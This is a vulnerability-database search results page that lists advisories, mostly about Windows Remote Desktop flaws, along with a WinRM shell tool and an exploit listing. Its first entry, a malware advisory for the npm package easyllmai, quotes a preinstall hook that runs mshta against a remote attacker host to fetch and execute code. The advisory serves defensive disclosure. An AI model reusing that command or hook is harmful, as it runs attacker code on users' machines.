Lucene search
+L

663 matches found

OSV
OSV
added 2026/06/16 4:1 p.m.10 views

MAL-2026-5895 Malicious code in easyllmai (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2f3b4523b083331b34769a2a730586fa622f50560f2f237a893633e7ffb57872 On npm install, the package's preinstall lifecycle hook "preinstall": "node preinstall.js" unconditionally runs exec'cmd /c "mshta http://fixars.top"...

6.4AI score
Exploits0References2
RedhatCVE
RedhatCVE
added 2026/06/10 9:0 p.m.15 views

CVE-2026-42908

Out-of-bounds read in Windows RDP allows an unauthorized attacker to disclose information over a network...

7.5CVSS5.4AI score0.0087EPSS
Exploits0References1
EUVD
EUVD
added 2026/06/09 5:6 p.m.11 views

EUVD-2026-35597

Out-of-bounds read in Windows RDP allows an unauthorized attacker to disclose information over a network...

7.5CVSS5.4AI score0.0087EPSS
Exploits0References1
CVE
CVE
added 2026/06/09 5:6 p.m.53 views

CVE-2026-42908

The CVE-2026-42908 entry describes an Out-of-bounds read in Windows Remote Desktop Protocol (RDP) that enables an unauthenticated attacker to disclose information over the network. Affected component is Windows RDP; the underlying fault is an out-of-bounds read, leading to information disclosure....

7.5CVSS5.4AI score0.0087EPSS
Exploits0References1Affected Software14
CVE
CVE
added 2026/06/09 5:4 p.m.43 views

CVE-2026-45639

The CVE-2026-45639 entry relates to an out-of-bounds read in Windows Remote Desktop Protocol (RDP). The underlying issue enables an unauthenticated, network-based attacker to disclose information over the network without user interaction. The CVSS 3.1 vector is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:...

7.5CVSS5.4AI score0.0087EPSS
Exploits0References1Affected Software15
OSV
OSV
added 2026/06/09 12:16 a.m.8 views

DEBIAN-CVE-2026-11680

Use after free in Media in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. Chromium security severity: High...

8.8CVSS6AI score0.00243EPSS
Exploits0References1
Positive Technologies
Positive Technologies
added 2026/06/09 12:0 a.m.15 views

PT-2026-47887

Name of the Vulnerable Software and Affected Versions Windows RDP affected versions not specified Description An out-of-bounds read in Windows Remote Desktop Protocol RDP allows an unauthorized attacker to disclose information over a network. This issue enables unauthenticated snooping of sensiti...

7.8CVSS5.5AI score0.0087EPSS
Exploits0References13
Positive Technologies
Positive Technologies
added 2026/06/09 12:0 a.m.21 views

PT-2026-48003

Name of the Vulnerable Software and Affected Versions Windows RDP affected versions not specified Description An out-of-bounds read in Windows Remote Desktop Protocol RDP allows an unauthenticated and unauthorized attacker to disclose information from memory over a network. Recommendations At the...

7.8CVSS5.5AI score0.0087EPSS
Exploits0References17
Packet Storm News
Packet Storm News
added 2026/05/18 12:0 a.m.13 views

nimrm 1.2.0

nimrm is a native WinRM interactive shell client written in Nim. It's designed to be a compact and fast tool for system administration and authorized security testing. Key features include NTLM and Kerberos authentication, in-memory operations, file transfers, OPSEC awareness, and cross platform...

5.6AI score
Exploits0
Packet Storm News
Packet Storm News
added 2026/05/15 12:0 a.m.14 views

nimrm 1.1.0

nimrm is a native WinRM interactive shell client written in Nim. It's designed to be a compact and fast tool for system administration and authorized security testing. Key features include NTLM and Kerberos authentication, in-memory operations, file transfers, OPSEC awareness, and cross platform...

5.6AI score
Exploits0
RedhatCVE
RedhatCVE
added 2026/05/13 8:22 p.m.10 views

CVE-2026-40398

Heap-based buffer overflow in Windows Remote Desktop allows an authorized attacker to elevate privileges locally...

7.8CVSS6AI score0.02419EPSS
Exploits0References1
EUVD
EUVD
added 2026/05/12 6:30 p.m.17 views

EUVD-2026-29660

Heap-based buffer overflow in Windows Remote Desktop allows an authorized attacker to elevate privileges locally...

7.8CVSS5.9AI score0.02419EPSS
Exploits0References2
NVD
NVD
added 2026/05/12 6:17 p.m.9 views

CVE-2026-40398

Heap-based buffer overflow in Windows Remote Desktop allows an authorized attacker to elevate privileges locally...

7.8CVSS0.02419EPSS
Exploits0References1
ATTACKERKB
ATTACKERKB
added 2026/05/12 4:59 p.m.9 views

CVE-2026-40398

Heap-based buffer overflow in Windows Remote Desktop allows an authorized attacker to elevate privileges locally...

7.8CVSS5.9AI score0.02419EPSS
Exploits0References2Affected Software20
CVE
CVE
added 2026/05/12 4:59 p.m.77 views

CVE-2026-40398

CVE-2026-40398 is a heap-based buffer overflow in Windows Remote Desktop Services that allows an authenticated attacker to perform local privilege escalation. The description across sources consistently identifies a local, authenticated exploit path with a high impact (C/H/I/A: High) and a CVSS v...

7.8CVSS5.9AI score0.02419EPSS
Exploits0References1Affected Software14
Microsoft CVE
Microsoft CVE
added 2026/05/12 2:0 p.m.13 views

Windows Remote Desktop Services Elevation of Privilege Vulnerability

Heap-based buffer overflow in Windows Remote Desktop allows an authorized attacker to elevate privileges locally...

7.8CVSS6AI score0.02419EPSS
Exploits0
Positive Technologies
Positive Technologies
added 2026/04/27 12:0 a.m.8 views

PT-2026-35367

Date: April 27, 2026 Status: ACTIVE EXPLOITATION / PERIMETER & INTERNAL RISK Target: Microsoft Windows RPC Runtime All Versions: Windows 10, 11, Server 2016-2025 Severity: 9.8 MAXIMUM CRITICAL Unauthenticated Remote Code Execution / LPE...

6.4AI score
Exploits0References1
GithubExploit
GithubExploit
added 2026/04/16 8:29 p.m.153 views

Exploit for Time-of-check Time-of-use (TOCTOU) Race Condition in Microsoft

CVE-2024-30088 – WinRM Adapted PoC 📌 Summary This is a mo...

7CVSS7.5AI score0.68202EPSS
Exploits7
EUVD
EUVD
added 2026/04/14 6:30 p.m.7 views

EUVD-2026-22372

Insufficient ui warning of dangerous operations in Windows Remote Desktop allows an unauthorized attacker to perform spoofing over a network...

7.1CVSS5.8AI score0.0083EPSS
Exploits0References2
EUVD
EUVD
added 2026/04/14 6:30 p.m.4 views

EUVD-2026-22385

Missing authentication for critical function in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges locally...

7.8CVSS5.8AI score0.00266EPSS
Exploits0References2
Rows per page
Query Builder